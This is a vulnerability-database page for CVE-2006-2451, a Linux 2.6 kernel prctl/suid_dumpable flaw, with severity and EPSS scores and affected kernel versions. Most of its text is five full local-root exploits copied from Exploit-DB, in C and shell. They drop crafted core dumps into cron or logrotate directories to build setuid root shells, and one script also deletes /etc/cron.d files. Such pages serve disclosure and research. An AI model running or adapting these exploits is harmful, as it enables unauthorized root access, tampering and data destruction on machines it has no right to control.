CVE-2006-2451

EPSS

12.03%V4

Vector

Local

Published

2006-07-07
16h00 +00:00

Modified

2018-10-18
12h57 +00:00

Official links

CVE.org

NVD

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Notifications manage

List of Notifications

Notifications for a CVE

Stay informed of any changes for a specific CVE.

Criteria applied when sending the alert: compared with the last alert sent + differences in CISA, EPSS, CVSS, CWE, Solutions, CPE.

Parameters

You can specify a title that will be retrieved in the alerts that will be sent out.

Specified here a CVE ID as CVE-2025-1234

Planning

Month

Next run calculation

Day

Weekday

Hour

Minute

Creation date

Last execution

Next execution

Functionality requiring a connection

This feature, which allows you to receive alerts, is only active when you are logged into your account.

CVE Descriptions

The suid_dumpable support in Linux kernel 2.6.13 up to versions before 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial of service (disk consumption) and possibly gain privileges via the PR_SET_DUMPABLE argument of the prctl function and a program that causes a core dump file to be created in a directory for which the user does not have permissions.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-399	Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	4.6		AV:L/AC:L/Au:N/C:P/I:P/A:P	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	3.22%	–	–
2022-02-13	–	–	3.22%	–	–
2022-04-03	–	–	3.22%	–	–
2022-09-18	–	–	3.22%	–	–
2023-03-12	–	–	–	0.04%	–
2023-09-03	–	–	–	0.04%	–
2023-12-03	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	11.29%
2025-03-30	–	–	–	–	12.03%
2025-03-30	–	–	–	–	12.03,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	65%
2022-02-13	66%
2022-04-03	83%
2022-09-18	84%
2023-03-12	–
2023-09-03	6%
2023-12-03	–
2024-06-02	–
2025-01-19	–
2025-03-18	93%
2025-03-30	93%
2025-03-30	93%

Exploit information

Exploit Database EDB-ID : 2031

Publication date : 2006-07-17 22h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

/* * $Id: raptor_prctl2.c,v 1.3 2006/07/18 13:16:45 raptor Exp $ * * raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate) * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBLY (yeah, sure;) gain privileges via * the PR_SET_DUMPABLE argument of the prctl function and a program that causes * a core dump file to be created in a directory for which the user does not * have permissions (CVE-2006-2451). * * This exploit uses the logrotate attack vector: of course, you must be able * to chdir() into the /etc/logrotate.d directory in order to exploit the * vulnerability. I've experimented a bit with other attack vectors as well, * with no luck: at (/var/spool/atjobs/) uses file name information to * establish execution time, /etc/cron.hourly|daily|weekly|monthly want +x * permissions, xinetd (/etc/xinetd.d) puked out the crafted garbage-filled * coredump (see also http://www.0xdeadbeef.info/exploits/raptor_prctl.c). * * Thanks to Solar Designer for the interesting discussion on attack vectors. * * NOTE THAT IN ORDER TO WORK THIS EXPLOIT *MUST* BE STATICALLY LINKED!!! * * Usage: * $ gcc raptor_prctl2.c -o raptor_prctl2 -static -Wall * [exploit must be statically linked] * $ ./raptor_prctl2 * [please wait until logrotate is run] * $ ls -l /tmp/pwned * -rwsr-xr-x 1 root users 7221 2006-07-18 13:32 /tmp/pwned * $ /tmp/pwned * sh-3.00# id * uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users) * sh-3.00# * [don't forget to delete /tmp/pwned!] * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/stat.h> #include <sys/resource.h> #include <sys/prctl.h> #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" char payload[] = /* commands to be executed by privileged logrotate */ "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's create a fake logfile in /var/log */ if (!(pid = fork())) { chdir("/var/log"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/logrotate.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if ((stat("/var/log/core", &st) < 0) || (stat("/etc/logrotate.d/core", &st) < 0)) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } /* total pwnage */ fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n"); exit(0); } // milw0rm.com [2006-07-18]

Exploit Database EDB-ID : 2004

Publication date : 2006-07-10 22h00 +00:00
Author : dreyer & RoMaNSoFt
EDB Verified : Yes

/*****************************************************/ /* Local r00t Exploit for: */ /* Linux Kernel PRCTL Core Dump Handling */ /* ( BID 18874 / CVE-2006-2451 ) */ /* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4) */ /* By: */ /* - dreyer <luna@aditel.org> (main PoC code) */ /* - RoMaNSoFt <roman@rs-labs.com> (local root code) */ /* [ 10.Jul.2006 ] */ /*****************************************************/ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n"); corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); printf("[*] Creating Cron entry\n"); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62); printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i"); } // milw0rm.com [2006-07-11]

Exploit Database EDB-ID : 2005

Publication date : 2006-07-11 22h00 +00:00
Author : Julien Tinnes
EDB Verified : Yes

/* Linux >= 2.6.13 prctl kernel exploit * * (C) Julien TINNES * * If you read the Changelog from 2.6.13 you've probably seen: * [PATCH] setuid core dump * * This patch mainly adds suidsafe to suid_dumpable sysctl but also a new per process, * user setable argument to PR_SET_DUMPABLE. * * This flaw allows us to create a root owned coredump into any directory. * This is trivially exploitable. * */ #include <sys/types.h> #include <sys/time.h> #include <sys/resource.h> #include <sys/prctl.h> #include <unistd.h> #include <stdio.h> #include <errno.h> #include <signal.h> #include <stdlib.h> #include <time.h> #define CROND "/etc/cron.d" #define BUFSIZE 2048 struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY}; char crontemplate[]= "#/etc/cron.d/core suid_dumpable exploit\n" "SHELL=/bin/sh\n" "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n" "#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n"; char cronstring[BUFSIZE]; char fname[BUFSIZE]; struct timeval te; void sh(int sn) { execl(fname, fname, (char *) NULL); } int main(int argc, char *argv[]) { int nw, pid; if (geteuid() == 0) { printf("[+] getting root shell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } } printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n"); /* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("This is not fatal, rewrite the exploit\n"); } if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Installed signal handler\n"); /* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; } /* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Is you kernel version >= 2.6.13 ?\n"); return 1; } printf("[+] We are suidsafe dumpable!\n"); /* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] Malicious string forged\n"); if ((pid=fork()) == -1) { perror("[-] fork"); return 1; } if (pid == 0) { /* This is not the good way to do it ;) */ sleep(120); exit(0); } /* SEGFAULT the child */ printf("[+] Segfaulting child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120); printf("[-] It looks like the exploit failed\n"); return 1; } // milw0rm.com [2006-07-12]

Exploit Database EDB-ID : 2006

Publication date : 2006-07-12 22h00 +00:00
Author : Marco Ivaldi
EDB Verified : Yes

/* * $Id: raptor_prctl.c,v 1.1 2006/07/13 14:21:43 raptor Exp $ * * raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability * Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info> * * The suid_dumpable support in Linux kernel 2.6.13 up to versions before * 2.6.17.4, and 2.6.16 before 2.6.16.24, allows a local user to cause a denial * of service (disk consumption) and POSSIBILY (yeah, sure;) gain privileges * via the PR_SET_DUMPABLE argument of the prctl function and a program that * causes a core dump file to be created in a directory for which the user does * not have permissions (CVE-2006-2451). * * Berlin, Sunday July 9th 2006: CAMPIONI DEL MONDO! CAMPIONI DEL MONDO! * CAMPIONI DEL MONDO! (i was tempted to name this exploit "pajolo.c";)) * * Greets to Paul Starzetz and Roman Medina, who also exploited this ugly bug. * * NOTE. This exploit uses the Vixie's crontab /etc/cron.d attack vector: this * means that distributions that use a different configuration (namely Dillon's * crontab on Slackware Linux) can be vulnerable but not directly exploitable. * * Usage: * $ gcc raptor_prctl.c -o raptor_prctl -Wall * [exploit must be dinamically linked] * $ ./raptor_prctl * [...] * sh-3.00# * * Vulnerable platforms: * Linux from 2.6.13 up to 2.6.17.4 [tested on SuSE Linux 2.6.13-15.8-default] */ #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <sys/stat.h> #include <sys/resource.h> #include <sys/prctl.h> #define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability" #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" char payload[] = /* commands to be executed by privileged crond */ "\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n"; char pwnage[] = /* build setuid() helper to circumvent bash checks */ "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c"; int main(void) { int pid, i; struct rlimit corelimit; struct stat st; /* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); /* prepare the setuid() helper */ system(pwnage); /* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); /* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV); /* did it work? */ sleep(3); if (stat("/etc/cron.d/core", &st) < 0) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); } fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Please wait a couple of minutes;)\n"); /* wait for crond to execute our evil entry */ for (i = 0; i < 124; i += 2) { if (stat("/tmp/pwned", &st) < 0) { fprintf(stderr, "\nError: Check /tmp/pwned!\n"); exit(1); } if (st.st_uid == 0) break; fprintf(stderr, "."); sleep(2); } /* timeout reached? */ if (i > 120) { fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); exit(1); } /* total pwnage */ fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); system("/tmp/pwned"); exit(0); } // milw0rm.com [2006-07-13]

Exploit Database EDB-ID : 2011

Publication date : 2006-07-13 22h00 +00:00
Author : Sunay
EDB Verified : Yes

#!/bin/sh # # PRCTL local root exp By: Sunix # + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp # tested on Intel(R) Xeon(TM) CPU 3.20GHz # kernel 2.6.9-22.ELsmp # maybe others ... # Tx to drayer & RoMaNSoFt for their clear code... # # zmia23@yahoo.com cat > /tmp/getsuid.c << __EOF__ #include <stdio.h> #include <sys/time.h> #include <sys/resource.h> #include <unistd.h> #include <linux/prctl.h> #include <stdlib.h> #include <sys/types.h> #include <signal.h> char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n"; int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120); } __EOF__ cat > /tmp/s.c << __EOF__ #include<stdio.h> main(void) { setgid(0); setuid(0); system("/bin/sh"); system("rm -rf /tmp/s"); system("rm -rf /etc/cron.d/*"); return 0; } __EOF__ echo "wait aprox 4 min to get sh" cd /tmp cc -o s s.c cc -o getsuid getsuid.c ./getsuid ./s rm -rf getsuid* rm -rf s.c rm -rf prctl.sh # milw0rm.com [2006-07-14]

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.6.13

Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.13 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.1

Linux>>Linux_kernel >> Version 2.6.13.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.2

Linux>>Linux_kernel >> Version 2.6.13.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.3

Linux>>Linux_kernel >> Version 2.6.13.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.4

Linux>>Linux_kernel >> Version 2.6.13.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.13.5

Linux>>Linux_kernel >> Version 2.6.13.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)
Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14

Linux>>Linux_kernel >> Version 2.6.14 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.1

Linux>>Linux_kernel >> Version 2.6.14.1 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.2

Linux>>Linux_kernel >> Version 2.6.14.2 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.3

Linux>>Linux_kernel >> Version 2.6.14.3 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.4

Linux>>Linux_kernel >> Version 2.6.14.4 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.5

Linux>>Linux_kernel >> Version 2.6.14.5 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.6

Linux>>Linux_kernel >> Version 2.6.14.6 (Open CPE detail)

Linux>>Linux_kernel >> Version 2.6.14.7

Linux>>Linux_kernel >> Version 2.6.14.7 (Open CPE detail)